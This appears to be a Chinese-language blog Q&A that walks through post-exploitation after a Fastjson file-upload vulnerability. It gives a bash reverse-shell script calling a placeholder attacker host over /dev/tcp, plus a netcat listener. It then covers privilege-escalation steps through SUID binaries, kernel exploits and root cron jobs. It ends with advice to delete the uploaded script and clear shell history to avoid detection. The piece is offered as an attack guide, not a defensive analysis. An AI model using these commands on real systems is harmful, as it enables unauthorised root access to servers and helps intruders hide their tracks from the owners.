可以利用漏洞上传文件到/tmp,有什么办法获取和升级为root权限,怎么操作

通过 Fastjson 漏洞上传文件到 /tmp 目录是第一步,要进一步获取和升级为 root 权限通常涉及更多的步骤和利用更多的漏洞。

1. 上传一个反向 shell 脚本

首先,通过 Fastjson 漏洞上传一个反向 shell 脚本到 /tmp 目录。反向 shell 脚本可以用于在目标机器上启动一个连接到攻击者机器的 shell。

反向 shell 脚本示例
#!/bin/bash
bash -i >& /dev/tcp/attacker_ip/attacker_port 0>&1

通过 Fastjson 漏洞上传这个脚本,假设文件名为 reverse_shell.sh

2. 启动反向 shell

在攻击者机器上监听指定端口:

nc -lvnp attacker_port

在目标服务器上执行上传的脚本:

chmod +x /tmp/reverse_shell.sh
/tmp/reverse_shell.sh

一旦反向 shell 成功连接,攻击者将在攻击者机器上获得目标机器的 shell。

3. 提权为 root

有了低权限的 shell 后,接下来就是寻找提权漏洞。以下是常见的提权方法:

1. 查找 SUID 程序

SUID 程序是具有 root 权限的程序,可以利用这些程序进行提权。

find / -perm -u=s -type f 2>/dev/null

利用 SUID 程序进行提权的具体方法取决于目标系统上可利用的 SUID 程序。

2. 利用内核漏洞

如果目标系统运行的是易受攻击的内核版本,可以利用内核漏洞进行提权。使用 uname -a 检查内核版本,然后搜索可利用的漏洞。

uname -a
3. 利用 cron 作业

如果目标系统中有定时任务(cron job)以 root 权限运行,可以尝试修改或注入恶意脚本。

cat /etc/crontab

4. 提权示例:利用 SUID 程序

假设找到了一个易受攻击的 SUID 程序 /usr/bin/vulnerable_suid,可以尝试以下提权步骤:

# 在低权限 shell 中运行
/usr/bin/vulnerable_suid

# 具体的提权方法取决于该程序的漏洞,可以通过传递恶意参数或环境变量进行利用

5. 清理痕迹

提权成功后,建议清理上传的文件和日志以避免被检测:

rm /tmp/reverse_shell.sh
history -c
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

MonkeyKing.sun

对你有帮助的话,可以打赏

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值